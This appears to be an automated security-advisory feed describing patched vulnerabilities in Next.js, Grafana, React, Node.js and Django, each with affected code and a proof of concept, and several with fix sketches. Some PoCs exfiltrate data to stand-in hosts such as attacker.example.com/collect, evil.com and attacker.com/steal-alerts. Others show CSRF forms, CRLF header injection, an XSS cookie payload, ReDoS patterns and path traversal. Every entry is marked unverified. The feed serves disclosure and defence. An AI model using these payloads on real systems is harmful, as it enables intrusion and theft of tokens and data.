Before this patch, Next.js development servers only warned (but did not block) cross-origin requests to internal dev assets and endpoints (/_next/*, /__nextjs*) when `allowedDevOrigins` was not configured. An attacker could craft a malicious webpage that loads or interacts with internal dev-only resources (HMR WebSocket, error feedback endpoints, internal chunks) from any origin. The patch changes the default behavior from warn-only to blocking with a 403 response, preventing unauthorized cross-origin access to dev server internals.

🔍 View Affected Code & PoC

Affected Code

const mode = typeof allowedDevOrigins === 'undefined' ? 'warn' : 'block'
// ...
return warnOrBlockRequest(res, refererHostname, mode)
// ...
warnOrBlockRequest(res, originLowerCase, mode)

Proof of Concept

# Attacker hosts a page at https://attacker.example.com/exploit.html
# Developer is running Next.js dev server at http://localhost:3000

# The following page silently exfiltrates Next.js internal dev chunks or
# makes requests to internal endpoints without being blocked:

<html>
<body>
<script>
  // Before patch: this request succeeds with 200 (only a warning in CLI)
  fetch('http://localhost:3000/_next/static/chunks/pages/_app.js', {
    mode: 'no-cors',
    headers: { 'Sec-Fetch-Mode': 'no-cors', 'Sec-Fetch-Site': 'cross-site' }
  });

  // Or connect to HMR WebSocket to observe file changes
  const ws = new WebSocket('ws://localhost:3000/_next/webpack-hmr');
  ws.onmessage = (e) => { fetch('https://attacker.example.com/collect?d='+e.data); };
</script>
</body>
</html>

🔥 HIGH UNVERIFIED Authentication Bypass

Mar 17, 2026, 06:36 PM — grafana/grafana

Commit: 4eb83a7

Author: MdTanwer

The MSSQL connection string was built by directly concatenating the username and password without escaping special characters. Since semicolons are used as key-value delimiters in the connection string, a password containing a semicolon would be truncated at the semicolon, allowing authentication bypass or connection to unintended databases. For example, a password like `StrongPass;database=other` would cause the driver to parse `database=other` as a separate connection string parameter.

🔍 View Affected Code & PoC

Affected Code

connStr += fmt.Sprintf("user id=%s;password=%s;", dsInfo.User, dsInfo.DecryptedSecureJSONData["password"])

Proof of Concept

Set password to: `wrongpass;user id=sa` — the resulting connection string becomes `server=localhost;database=mydb;user id=user;password=wrongpass;user id=sa;` which causes go-mssqldb to use `sa` as the user id (last value wins in many parsers), potentially authenticating as a different user than intended. Alternatively, password=`x;database=master` redirects the connection to the master database regardless of configured database.
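A tiny Python parser makes the last-value-wins behavior concrete (a model of ADO-style splitting, not the actual go-mssqldb parser):

```python
# Connection strings are split on ';'; many parsers let the last
# duplicate key win, so a semicolon in the password injects parameters.
def parse_conn_str(s):
    params = {}
    for part in s.split(";"):
        if "=" in part:
            key, _, value = part.partition("=")
            params[key.strip().lower()] = value
    return params

user, password = "user", "wrongpass;user id=sa"   # attacker-chosen password
conn = f"server=localhost;database=mydb;user id={user};password={password};"

parsed = parse_conn_str(conn)
assert parsed["user id"] == "sa"          # injected value overrides the real one
assert parsed["password"] == "wrongpass"  # truncated at the semicolon
```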

🔥 HIGH UNVERIFIED Authorization Bypass / Privilege Escalation

Mar 17, 2026, 03:06 PM — grafana/grafana

Commit: 3293279

Author: Yuri Tseretyan

The provisioning API's `UpdateContactPoint` endpoint did not perform authorization checks for protected fields (e.g., webhook URLs, API keys) before the patch. Any user with access to the provisioning API could modify protected/sensitive fields in contact points without the required `receivers:update.protected` permission, bypassing the security controls enforced by the regular receiver API. The patch adds a `checkProtectedFields` method that verifies the user has appropriate permissions before allowing modifications to protected fields.

🔍 View Affected Code & PoC

Affected Code

func (ecp *ContactPointService) UpdateContactPoint(ctx context.Context, orgID int64, contactPoint apimodels.EmbeddedContactPoint, provenance models.Provenance) error {

Proof of Concept

A user with provisioning API access but without `receivers:update.protected` permission could send:

PUT /api/v1/provisioning/contact-points/{uid}
Content-Type: application/json
X-Disable-Provenance: true

{"uid":"existing-uid","name":"My Slack","type":"slack","settings":{"url":"https://attacker.com/steal-alerts"},"disableResolveMessage":false}

This would overwrite the protected webhook URL field without the `receivers:update.protected` permission check, allowing an attacker to redirect alert notifications to an attacker-controlled endpoint or exfiltrate alert data.
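The real `checkProtectedFields` is a Go method on `ContactPointService`; the JavaScript sketch below only illustrates the authorization idea. The protected field names and the shape of the permission check are assumptions:

```javascript
// Hypothetical sketch of the checkProtectedFields idea: diff the protected
// settings against the stored contact point and require the
// 'receivers:update.protected' permission if any of them changed.
// PROTECTED_FIELDS entries are illustrative, not Grafana's actual list.
const PROTECTED_FIELDS = ['url', 'apiKey'];

function checkProtectedFields(existing, incoming, userPermissions) {
  for (const field of PROTECTED_FIELDS) {
    const changed = existing.settings[field] !== incoming.settings[field];
    if (changed && !userPermissions.includes('receivers:update.protected')) {
      throw new Error(`permission denied: cannot modify protected field "${field}"`);
    }
  }
}
```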

💡 LOW UNVERIFIED Input Validation Bypass / Size Guard Bypass

Mar 17, 2026, 10:50 AM — facebook/react

Commit: 12ba7d8

Author: Sebastian "Sebbie" Silbermann

The `$B` (Blob) case in `parseModelString` did not validate that the FormData entry was actually a Blob before returning it. Since `FormData.get()` can return either a string or a Blob/File, an attacker could craft a malformed Server Action payload that stores a large string under a key and references it via `$B`, bypassing the `bumpArrayCount` size guard that applies to regular string values. The patch adds an `instanceof Blob` check that throws an error if the backing entry is not a real Blob, closing this bypass. While the PR notes this doesn't produce meaningful amplification on its own, it is a defense-in-depth fix against potential combined attacks.

🔍 View Affected Code & PoC

Affected Code

const backingEntry: Blob = (response._formData.get(blobKey): any);
return backingEntry;

Proof of Concept

const formData = new FormData();
formData.set('1', '-'.repeat(50000)); // large string, not a Blob
formData.set('0', JSON.stringify(['$B1'])); // reference it as a Blob
await ReactServerDOMServer.decodeReply(formData, webpackServerMap);
// Before patch: returns the large string bypassing blob size guards
// After patch: throws 'Referenced Blob is not a Blob.'

🔥 HIGH UNVERIFIED Open Redirect / Server-Side Request Forgery (SSRF)

Mar 17, 2026, 01:41 AM — vercel/next.js

Commit: 00bdb03

Author: Zack Tanner

The commit patches the compiled `http-proxy` / `follow-redirects` library bundled in Next.js, referencing security advisory GHSA-ggv3-7p47-pfv8. The vulnerability involves improper handling of HTTP redirects in the `follow-redirects` library, which could allow an attacker to manipulate redirect targets to leak sensitive request headers (such as Authorization) to unintended hosts or bypass security controls via crafted redirect responses. The patch updates the compiled bundle with fixes to the redirect handling logic.

🔍 View Affected Code & PoC

Affected Code

var r=e.headers.location;if(r&&this._options.followRedirects!==false&&t>=300&&t<400){this._currentRequest.removeAllListeners();this._currentRequest.on("error",noop);this._currentRequest.abort();e.destroy();if(++this._redirectCount>this._options.maxRedirects){this.emit("error",new Error("Max redirects exceeded."));return}

Proof of Concept

An attacker controls a server that returns a 301 redirect response pointing to an attacker-controlled host. When a Next.js application proxies a request with an Authorization header to the attacker's initial URL, the follow-redirects library follows the redirect and forwards the Authorization header to the attacker's second host:

1. Victim Next.js app makes request: GET https://attacker.com/step1 with 'Authorization: Bearer secret-token'
2. attacker.com/step1 responds: HTTP/1.1 301 Moved Permanently\r\nLocation: https://evil.com/collect\r\n
3. The vulnerable follow-redirects code follows the redirect and sends GET https://evil.com/collect with 'Authorization: Bearer secret-token'
4. Attacker's evil.com receives the sensitive token

This is exploitable when Next.js rewrites/proxies user-controlled or partially-controlled URLs with sensitive headers attached.

🔥 HIGH UNVERIFIED Cross-Site Request Forgery (CSRF)

Mar 17, 2026, 01:57 AM — vercel/next.js

Commit: a27a11d

Author: Zack Tanner

Before the patch, when the `Origin` header was set to the string `'null'` (which browsers send from privacy-sensitive contexts like sandboxed iframes), Next.js would skip the CSRF origin check entirely because the code treated `'null'` as a missing/invalid origin and fell through without validation. This allowed an attacker to embed a sandboxed iframe that submits a Server Action cross-origin with user credentials (cookies) attached, bypassing CSRF protection. The patch now treats `'null'` as a valid but opaque origin and checks it against the `allowedOrigins` allowlist, blocking unauthorized cross-origin Server Action submissions from sandboxed contexts.

🔍 View Affected Code & PoC

Affected Code

const originDomain =
    typeof originHeader === 'string' && originHeader !== 'null'
      ? new URL(originHeader).host
      : undefined

Proof of Concept

Attacker hosts malicious page at https://evil.com with:
<iframe sandbox="allow-forms" src="https://evil.com/attack.html"></iframe>

attack.html contains:
<form method="POST" action="https://victim.com/sensitive-page">
  <input name="$ACTION_ID_abc123" value="" />
  <input type="submit" />
</form>
<script>document.forms[0].submit()</script>

Browser sends: Origin: null (opaque origin from sandboxed iframe)
Before patch: originDomain = undefined, CSRF check is skipped with only a warning, action executes with victim's cookies.
After patch: originDomain = 'null', checked against allowedOrigins; since 'null' is not in allowedOrigins, the request is rejected with 403/500.
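The patched behavior can be sketched as follows (`isOriginAllowed` is a hypothetical stand-in for Next.js's actual Server Action check; it mirrors the `originDomain` computation in the affected code):

```javascript
// Sketch of the patched behavior: treat 'null' as a real (opaque) origin that
// must be explicitly allowlisted, instead of skipping validation entirely.
function isOriginAllowed(originHeader, allowedOrigins) {
  if (typeof originHeader !== 'string') return false; // no Origin header at all
  let host;
  try {
    // 'null' is the opaque origin browsers send from sandboxed iframes.
    host = originHeader === 'null' ? 'null' : new URL(originHeader).host;
  } catch {
    return false; // malformed Origin header
  }
  return allowedOrigins.includes(host);
}
```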

🔥 HIGH UNVERIFIED Cross-Site WebSocket Hijacking / CSRF

Mar 17, 2026, 12:42 AM — vercel/next.js

Commit: 862f9b9

Author: Zack Tanner

Before the patch, WebSocket connections to Next.js dev server endpoints (e.g., /_next/webpack-hmr) were accepted from privacy-sensitive origins (e.g., pages served with 'sandbox' CSP that sets origin to null). The old code only blocked requests when rawOrigin was truthy AND not equal to 'null', meaning requests with origin header 'null' (sent by sandboxed iframes/pages) bypassed origin validation entirely. The patch fixes this by treating a 'null' origin as a defined but non-allowed origin, causing such requests to be blocked.

🔍 View Affected Code & PoC

Affected Code

if (rawOrigin && rawOrigin !== 'null') {
  const parsedOrigin = parseUrl(rawOrigin)
  if (parsedOrigin) {
    const originLowerCase = parsedOrigin.hostname.toLowerCase()
    if (!isCsrfOriginAllowed(originLowerCase, allowedOrigins)) {
      return warnOrBlockRequest(res, originLowerCase, mode)
    }
  }
}
return false

Proof of Concept

1. Attacker hosts a page at http://attacker.com/ with Content-Security-Policy: sandbox allow-scripts (causing browser to send Origin: null for requests)
2. Page contains: <script>const ws = new WebSocket('http://localhost:3000/_next/webpack-hmr'); ws.onmessage = (e) => { fetch('https://attacker.com/collect?d='+encodeURIComponent(e.data)) }</script>
3. Victim (developer) visits http://attacker.com/ while running Next.js dev server
4. Browser sends WebSocket upgrade with Origin: null header
5. Old code skips validation (rawOrigin === 'null' condition exits early), connection is accepted
6. Attacker can receive HMR messages, potentially revealing source code structure or injecting malicious HMR updates

🔥 HIGH UNVERIFIED Missing Authorization / Broken Access Control

Mar 16, 2026, 11:31 PM — grafana/grafana

Commit: 5c89af6

Author: Ezequiel Victorero

Before this patch, the Kubernetes API endpoints for dashboard snapshots (GET, LIST, DELETE, POST /create, DELETE /delete/{deleteKey}, GET /settings) used a default `ServiceAuthorizer` that did not enforce RBAC permissions for snapshot resources. Any authenticated user, regardless of their assigned permissions, could read, list, create, and delete snapshots. The patch adds a `SnapshotAuthorizer` that maps K8s verbs to Grafana RBAC actions (`snapshots:read`, `snapshots:create`, `snapshots:delete`) and applies RBAC checks to the custom HTTP routes as well.

🔍 View Affected Code & PoC

Affected Code

func (b *DashboardsAPIBuilder) GetAuthorizer() authorizer.Authorizer {
	return grafanaauthorizer.NewServiceAuthorizer()
}

Proof of Concept

A user with no snapshot permissions (e.g., Org role 'None') can access snapshot data:

GET /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots
  -> Returns 200 OK with snapshot list (should be 403 Forbidden)

DELETE /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots/{snapshotKey}
  -> Returns 200 OK (should be 403 Forbidden)

POST /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots/create
  Body: {"dashboard":{"uid":"existing-uid","title":"test"},"name":"stolen"}
  -> Returns 200 OK creating a snapshot (should be 403 Forbidden)
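Grafana's `SnapshotAuthorizer` is Go; below is a hedged JavaScript sketch of the verb-to-RBAC-action mapping it introduces. The action names follow the description above; the function shape is an assumption:

```javascript
// Hedged sketch of the SnapshotAuthorizer idea: map Kubernetes verbs onto
// Grafana RBAC actions and deny anything the user's permission set lacks.
const VERB_TO_ACTION = {
  get: 'snapshots:read',
  list: 'snapshots:read',
  create: 'snapshots:create',
  delete: 'snapshots:delete',
};

function authorizeSnapshotRequest(verb, userPermissions) {
  const action = VERB_TO_ACTION[verb];
  if (!action) return { allowed: false, reason: `unknown verb "${verb}"` };
  return userPermissions.includes(action)
    ? { allowed: true }
    : { allowed: false, reason: `missing RBAC action "${action}"` };
}
```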

🔥 HIGH UNVERIFIED Broken Access Control / Insecure Direct Object Reference

Mar 16, 2026, 07:55 PM — grafana/grafana

Commit: f62299e

Author: Michael Mandrus

Public dashboard CRUD endpoints (Delete, Update, ExistsEnabledByDashboardUid) were only checking the user's role/permissions but not validating that the public dashboard being operated on belonged to the same organization as the requesting user. This allowed an authenticated user with Editor+ permissions in Org B to delete, update, or check the existence of public dashboards belonging to Org A, without having access to the source dashboard. The patch adds org_id checks to all relevant database queries to enforce org isolation.

🔍 View Affected Code & PoC

Affected Code

func (d *PublicDashboardStoreImpl) Delete(ctx context.Context, uid string) (int64, error) {
	dashboard := &PublicDashboard{Uid: uid}
	var affectedRows int64
	err := d.sqlStore.WithDbSession(ctx, func(sess *db.Session) error {
		var err error
		affectedRows, err = sess.Delete(dashboard)

Proof of Concept

# Attacker is admin in OrgB (orgId=2), wants to delete a public dashboard in OrgA (orgId=1)
# They know the dashboardUid and public dashboard uid from prior reconnaissance
curl -X DELETE http://orgb_admin:password@localhost:3000/api/dashboards/uid/orgA_dashboard_uid/public-dashboards/orgA_pubdash_uid
# Before patch: deletion succeeds because only RBAC role is checked, not org ownership
# The Delete service call was: api.PublicDashboardService.Delete(c.Req.Context(), uid, dashboardUid)
# without passing c.GetOrgID(), so the store deleted any public dashboard matching uid regardless of org

🔥 HIGH UNVERIFIED XSS / Prototype Pollution

Mar 6, 2026, 08:24 AM — grafana/grafana

Commit: cf7d85c

Author: dependabot[bot]

DOMPurify 3.3.1 contained multiple security vulnerabilities: a bypass via jsdom's faulty raw-text tag parsing that could allow XSS payloads to pass through sanitization, a prototype pollution issue when working with custom elements, and a lenient config parsing issue in `_isValidAttribute`. These vulnerabilities could allow attackers to inject malicious HTML/JavaScript that bypasses DOMPurify's sanitization, leading to XSS attacks in Grafana's frontend which uses DOMPurify to sanitize user-supplied content.

🔍 View Affected Code & PoC

Affected Code

"dompurify": "3.3.1"

Proof of Concept

// Prototype pollution via custom elements in DOMPurify 3.3.1:
// An attacker could craft input like:
const payload = '<custom-element constructor="polluted"></custom-element>';
DOMPurify.sanitize(payload); // Could pollute Object.prototype

// XSS bypass via jsdom raw-text tag parsing:
const xssPayload = '<script type="text/plain"></script><img src=x onerror=alert(document.cookie)>';
// In jsdom environments, DOMPurify 3.3.1 might fail to sanitize this correctly,
// allowing the onerror handler to execute when rendered in a browser

⚠️ MEDIUM UNVERIFIED Regular Expression Denial of Service (ReDoS)

Mar 6, 2026, 08:34 AM — grafana/grafana

Commit: 333964d

Author: Jack Westbrook

minimatch versions prior to 3.1.2 (and the corresponding releases in later major lines) contained a ReDoS vulnerability (CVE-2022-3517): specially crafted patterns could cause catastrophic backtracking in the regular expression engine. This patch upgrades minimatch from vulnerable versions (3.0.5, 9.0.3, 5.0.1, 7.4.6) to patched versions (3.1.4, 10.2.4, 5.1.9, 7.4.9) that fix the ReDoS issue. The vulnerability could allow an attacker to cause a denial of service by supplying a malicious glob pattern.

🔍 View Affected Code & PoC

Affected Code

minimatch: "npm:3.0.5"  // in @lerna/create and lerna dependencies
minimatch: "npm:9.0.3"  // in @nx/devkit
minimatch: "npm:5.0.1"  // version ^5.0.1
minimatch: "npm:7.4.6"  // version ^7.4.3

Proof of Concept

const minimatch = require('minimatch'); // vulnerable version, e.g. 3.0.5
// CVE-2022-3517: ReDoS with crafted input
// The following pattern causes catastrophic backtracking:
const start = Date.now();
minimatch('a' + 'a'.repeat(25) + '!', '{' + 'a,'.repeat(25) + 'b}');
console.log('Time:', Date.now() - start, 'ms'); // takes exponentially long, causing DoS

🔥 HIGH UNVERIFIED Prototype Pollution

Mar 6, 2026, 08:12 AM — grafana/grafana

Commit: d0a5b71

Author: dependabot[bot]

The immutable library versions prior to 5.1.5 contained a Prototype Pollution vulnerability (Improperly Controlled Modification of Object Prototype Attributes). This allowed attackers to manipulate JavaScript object prototypes through specially crafted keys like '__proto__', 'constructor', or 'prototype', potentially affecting all objects in the application. The patch upgrades immutable from 5.1.4 to 5.1.5 which fixes this vulnerability.

🔍 View Affected Code & PoC

Affected Code

"immutable": "5.1.4"

Proof of Concept

const { fromJS } = require('immutable'); // v5.1.4 (vulnerable)
const malicious = fromJS(JSON.parse('{"__proto__": {"polluted": true}}'));
console.log(({}).polluted); // true - prototype has been polluted
// This allows attackers to inject properties into Object.prototype,
// affecting all subsequent object property lookups in the application
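The actual fix is simply upgrading to immutable 5.1.5. As generic defense-in-depth against this attack class, a sketch that strips polluting keys from untrusted JSON before it reaches any deep-convert/merge code (`safeFromJSON` is a hypothetical helper, not part of immutable's API):

```javascript
// Generic defense-in-depth for this vulnerability class: strip polluting keys
// from untrusted JSON before handing it to any deep-convert/merge code.
const DANGEROUS_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeFromJSON(text) {
  return JSON.parse(text, function reviver(key, value) {
    if (DANGEROUS_KEYS.has(key)) return undefined; // returning undefined drops the property
    return value;
  });
}
```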

🔥 HIGH UNVERIFIED Use-After-Free / Memory Corruption

Mar 6, 2026, 06:01 AM — nodejs/node

Commit: a06e789

Author: Gerhard Stöbich

When pipelined HTTP requests arrive in a single TCP segment, llhttp_execute() processes all of them in one call. If a synchronous 'close' event handler calls freeParser() mid-execution, cleanParser() nulls out parser state while llhttp_execute() is still on the call stack, causing use-after-free/null-pointer dereference crashes on subsequent callbacks. The patch adds an is_being_freed_ flag that causes the Proxy::Raw callback to return early (HPE_USER) when set, aborting llhttp_execute() before it accesses freed/nulled parser state.

🔍 View Affected Code & PoC

Affected Code

if (parser->connectionsList_ != nullptr) {
  parser->connectionsList_->Pop(parser);
  parser->connectionsList_->PopActive(parser);
}

Proof of Concept

const { createServer } = require('http');
const { connect } = require('net');
const server = createServer((req, res) => {
  // Synchronously emit 'close' to trigger freeParser() while llhttp_execute() is still on the stack
  req.socket.emit('close');
  res.end();
});
server.listen(0, () => {
  const client = connect(server.address().port);
  // Send two pipelined requests in one write - processed by a single llhttp_execute() call
  // When 'close' fires during first request, parser is freed while second request is still being parsed
  client.end(
    'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: keep-alive\r\n\r\n' +
    'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n'
  );
});
// Result before patch: process crashes with SIGSEGV or assertion failure due to null pointer dereference

⚠️ MEDIUM UNVERIFIED ReDoS (Regular Expression Denial of Service)

Mar 3, 2026, 11:14 PM — nodejs/node

Commit: 330e3ee

Author: dependabot[bot]

The minimatch library versions before 3.1.5 contained a ReDoS vulnerability where specially crafted glob patterns could cause catastrophic backtracking in regular expression matching, leading to excessive CPU consumption and denial of service. The fix in 3.1.5 includes limiting recursion in pattern matching to prevent exponential backtracking. However, this affects only developer tooling (clang-format), not the Node.js runtime itself, limiting real-world impact.

🔍 View Affected Code & PoC

Affected Code

"version": "3.1.3",
"resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.3.tgz",
"integrity": "sha512-M2GCs7Vk83NxkUyQV1bkABc4yxgz9kILhHImZiBPAZ9ybuvCb0/H7lEl5XvIg3g+9d4eNotkZA5IWwYl0tibaA=="

Proof of Concept

const minimatch = require('minimatch');
// This pattern causes catastrophic backtracking in minimatch < 3.1.5
const maliciousPattern = '{' + 'a,'.repeat(100) + 'a}';
console.time('match');
minimatch('aaaaaaaaaaaaaaaaaaaaaaaaa', maliciousPattern);
console.timeEnd('match'); // Takes extremely long time, blocking event loop

🔥 HIGH UNVERIFIED Path Traversal / Arbitrary File Overwrite

Mar 3, 2026, 02:57 PM — grafana/grafana

Commit: 44fe577

Author: Jack Westbrook

The `tar` npm package versions 6.x and earlier contain a path traversal vulnerability (CVE-2024-28863 and related CVEs) where specially crafted tar archives can write files outside the intended extraction directory. By bumping `tar` from version 6.x to 7.x, this patch removes the vulnerable version and its dependency chain (including the old `cacache@^15.2.0` which depended on `tar@^6.0.2`). The vulnerability allowed an attacker to craft a malicious tarball that, when extracted, could overwrite arbitrary files on the filesystem.

🔍 View Affected Code & PoC

Affected Code

"cacache@npm:^15.2.0":
  tar: "npm:^6.0.2"
  ...
(tar 6.x is vulnerable to path traversal via crafted archive entries)

Proof of Concept

Using tar 6.x, create a malicious tarball containing an entry whose path includes traversal sequences, e.g. '../../../../etc/cron.d/malicious'. When extracted via `tar.x({file: 'malicious.tar', cwd: '/safe/dir'})`, the entry is written outside the extraction directory (here, to /etc/cron.d/malicious). Example: `const tar = require('tar'); tar.x({file: 'malicious.tar', cwd: '/tmp/safe'})` where malicious.tar contains an entry with path '../../../tmp/pwned' using a crafted header with absolute or traversal path sequences.

⚠️ MEDIUM UNVERIFIED Denial of Service (DoS)

Jan 30, 2026, 01:52 AM — django/django

Commit: 951ffb3

Author: Natalia

Django's URLField.to_python() used urlsplit() to detect URL schemes, which on Windows performs NFKC Unicode normalization. This normalization is disproportionately slow for inputs containing certain Unicode characters (e.g., characters like '¾'), allowing an attacker to craft a POST payload that causes excessive CPU consumption. The patch replaces urlsplit() with str.partition(':') for scheme detection, avoiding Unicode normalization entirely.

🔍 View Affected Code & PoC

Affected Code

try:
    return list(urlsplit(url))
except ValueError:
    # urlsplit can raise a ValueError with some
    # misformatted URLs.
    raise ValidationError(self.error_messages["invalid"], code="invalid")

Proof of Concept

On Windows, send a POST request with a URLField value containing a large string of Unicode characters that trigger slow NFKC normalization:

import requests
# Craft a payload with characters that cause slow NFKC normalization
payload = {'url_field': 'http://' + '\u00be' * 50000}  # '¾' repeated 50000 times
requests.post('http://target-django-app/form/', data=payload)
# This causes urlsplit() to perform slow Unicode normalization on Windows,
# consuming excessive CPU and potentially blocking the server's worker threads.

💡 LOW UNVERIFIED Incorrect Permissions / Race Condition (umask)

Jan 21, 2026, 09:03 PM — django/django

Commit: 019e44f

Author: Natalia

In multi-threaded Django applications, the file-based cache backend and filesystem storage used temporary umask changes (via os.umask()) to control directory permissions when creating directories. Because os.umask() is a process-wide operation, a temporary umask change in one thread could affect directory/file creation in other threads, resulting in file system objects being created with unintended (potentially overly permissive) permissions. The patch replaces the umask manipulation approach with a safe_makedirs() function that uses os.chmod() after os.mkdir() to enforce the exact requested permissions.

🔍 View Affected Code & PoC

Affected Code

old_umask = os.umask(0o077)
try:
    os.makedirs(self._dir, 0o700, exist_ok=True)
finally:
    os.umask(old_umask)

Proof of Concept

import threading, os, tempfile, time
# In a multi-threaded Django app using FileBasedCache:
# Thread A calls _createdir() which sets umask to 0o077
# Thread B simultaneously creates a file/directory expecting default umask (e.g., 0o022)
# Thread B's file ends up with permissions masked by Thread A's 0o077 umask
# Concrete example:
tmp = tempfile.mkdtemp()
def thread_a():
    # Simulates FileBasedCache._createdir() - sets umask to 0o077
    os.umask(0o077)
    time.sleep(0.01)  # holds umask while thread B runs
    os.umask(0o022)  # restore

def thread_b():
    time.sleep(0.005)  # starts after thread A changes umask
    path = os.path.join(tmp, 'upload_dir')
    os.makedirs(path, 0o755, exist_ok=True)  # intended: rwxr-xr-x
    print(oct(os.stat(path).st_mode))  # actual: 0o700 (too restrictive) due to umask 0o077

ta = threading.Thread(target=thread_a)
tb = threading.Thread(target=thread_b)
ta.start(); tb.start(); ta.join(); tb.join()

🔥 HIGH UNVERIFIED HTTP Header Injection (CRLF Injection)

Mar 2, 2026, 07:10 PM — nodejs/node

Commit: acb79bc

Author: Matteo Collina

The `path` property on `ClientRequest` was only validated against `INVALID_PATH_REGEX` at construction time. After construction, an attacker (or vulnerable application code) could reassign `req.path` to include CRLF sequences (`\r\n`), which would then be flushed verbatim to the socket in `_implicitHeader()`, allowing injection of arbitrary HTTP headers or request smuggling. The patch adds a getter/setter using a symbol-backed property so validation runs on every assignment.

🔍 View Affected Code & PoC

Affected Code

this.path = options.path || '/';

Proof of Concept

const http = require('http');
const req = new http.ClientRequest({ host: 'example.com', port: 80, path: '/safe', method: 'GET', createConnection: () => {} });
// After construction, mutate path with CRLF injection
req.path = '/safe\r\nX-Injected: malicious\r\nFoo: bar';
// When _implicitHeader() fires, it sends: GET /safe\r\nX-Injected: malicious\r\nFoo: bar HTTP/1.1
// This injects arbitrary headers into the outgoing HTTP request
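Node's actual patch uses a symbol-backed accessor in `_http_client.js`; a simplified sketch of the pattern (the regex mirrors Node's `INVALID_PATH_REGEX`; the `SketchRequest` class is illustrative):

```javascript
// Simplified sketch of the patched pattern: back the property with a symbol
// and validate on every assignment, not just in the constructor.
const INVALID_PATH_REGEX = /[^\u0021-\u00ff]/; // rejects \r, \n, space, ...
const kPath = Symbol('path');

class SketchRequest {
  constructor(path) { this.path = path; } // runs through the setter below
  get path() { return this[kPath]; }
  set path(value) {
    if (INVALID_PATH_REGEX.test(value)) {
      throw new TypeError('Request path contains unescaped characters');
    }
    this[kPath] = value;
  }
}
```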

🔥 HIGH UNVERIFIED CRLF Injection

Mar 2, 2026, 12:49 PM — nodejs/node

Commit: e78bf55

Author: Richard Clarke

The `writeEarlyHints()` function in Node.js HTTP server directly concatenated user-supplied header names and values into the raw HTTP/1.1 response without any validation. Unlike `setHeader()` and `writeHead()`, no calls to `validateHeaderName()`, `validateHeaderValue()`, or `checkInvalidHeaderChar()` were made, allowing CRLF sequences to pass through unchecked and inject arbitrary HTTP headers or entire responses. The patch adds proper validation for header names, values, and Link header URLs.

🔍 View Affected Code & PoC

Affected Code

const keys = ObjectKeys(hints);
for (let i = 0; i < keys.length; i++) {
  const key = keys[i];
  if (key !== 'link') {
    head += key + ': ' + hints[key] + '\r\n';
  }
}

Proof of Concept

const http = require('http');
const server = http.createServer((req, res) => {
  // Inject a fake Set-Cookie header via CRLF in a non-link header value
  res.writeEarlyHints({
    'link': '</style.css>; rel=preload; as=style',
    'X-Custom': 'value\r\nSet-Cookie: session=hijacked; Path=/'
  });
  res.end('hello');
});
// The raw HTTP response will contain an injected 'Set-Cookie: session=hijacked' header
// because 'value\r\nSet-Cookie: session=hijacked; Path=/' is concatenated directly into the response.
// Similarly, injecting via header name: { 'X-Foo\r\nSet-Cookie: evil=1': 'v' }
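A sketch of the kind of checks the patch adds (`validateHint` is a hypothetical stand-in; the regexes mirror Node's token and header-char validators). CR and LF fail both checks, so injected headers are rejected before concatenation:

```javascript
// Header-name tokens (RFC 7230) and header values exclude CR/LF, so
// validating both before building the raw 103 response blocks the injection.
const TOKEN_REGEX = /^[\^_`a-zA-Z\-0-9!#$%&'*+.|~]+$/;
const INVALID_VALUE_CHAR = /[^\t\x20-\x7e\x80-\xff]/;

function validateHint(name, value) {
  if (!TOKEN_REGEX.test(name)) {
    throw new TypeError(`Invalid header name: "${name}"`);
  }
  if (INVALID_VALUE_CHAR.test(String(value))) {
    throw new TypeError(`Invalid character in header value for "${name}"`);
  }
}
```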

⚠️ MEDIUM UNVERIFIED Header Injection / Information Disclosure

Mar 2, 2026, 12:49 AM — nodejs/node

Commit: a6e9e32

Author: Node.js GitHub Bot

The cache interceptor was spreading `result.vary` headers directly into revalidation requests without filtering out `null` values. When a request header specified in the `Vary` header was absent from the original request, it was stored as `null` in the cache entry's `vary` map. Spreading this `null` value into the revalidation headers could corrupt the header object and potentially send unintended null-valued headers to the server. The patch adds a null-check guard so only present header values are forwarded during revalidation.

🔍 View Affected Code & PoC

Affected Code

if (result.vary) {
  headers = {
    ...headers,
    ...result.vary
  }
}

Proof of Concept

// Server responds with Vary: accept-encoding
// Original request does NOT include accept-encoding header
// Cache stores vary = { 'accept-encoding': null }
// On revalidation, the spread { ...headers, ...result.vary } produces:
// { 'if-modified-since': '...', 'accept-encoding': null }
// Sending a request with a null-valued header could bypass server-side Vary matching
// or cause unexpected behavior in downstream servers/proxies that interpret null differently.
// Trigger: make a cached request without 'accept-encoding', wait for stale-while-revalidate,
// observe the revalidation request incorrectly includes 'accept-encoding: null'
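The fix can be sketched as a null-filtering merge (`buildRevalidationHeaders` is a hypothetical name; the real logic lives in undici's cache interceptor):

```javascript
// Sketch of the fix: forward only vary'd headers that were actually present
// on the original request (non-null), instead of spreading the raw vary map.
function buildRevalidationHeaders(headers, vary) {
  const out = { ...headers };
  for (const [name, value] of Object.entries(vary ?? {})) {
    if (value !== null && value !== undefined) out[name] = value;
  }
  return out;
}
```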

⚠️ MEDIUM UNVERIFIED ReDoS (Regular Expression Denial of Service)

Mar 1, 2026, 02:27 PM — nodejs/node

Commit: 4d0cb65

Author: Node.js GitHub Bot

This update to minimatch 10.2.4 adds mitigations for ReDoS vulnerabilities by introducing `maxGlobstarRecursion` and `maxExtglobRecursion` limits to prevent catastrophic backtracking when processing untrusted glob patterns. The README explicitly acknowledges that user-controlled glob patterns can be weaponized for DoS attacks. The patch adds depth tracking and recursion limits for extglob and globstar patterns to cap the complexity of the generated regular expressions.

🔍 View Affected Code & PoC

Affected Code

// No recursion depth limits on extglob nesting or globstar patterns
// Untrusted input could generate catastrophically backtracking RegExp
const assertValidPattern: (pattern: any) => void = (
  pattern: any,
): asserts pattern is string => {

Proof of Concept

const { minimatch } = require('minimatch');
// Before the patch, deeply nested extglob patterns from untrusted input
// could cause catastrophic backtracking:
const evilPattern = '*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a))))))))))';
const evilInput = 'a'.repeat(30);
// This would hang/crash Node.js process due to ReDoS
minimatch(evilInput, evilPattern);

🔥 HIGH UNVERIFIED Information Disclosure (Uninitialized Memory Exposure)

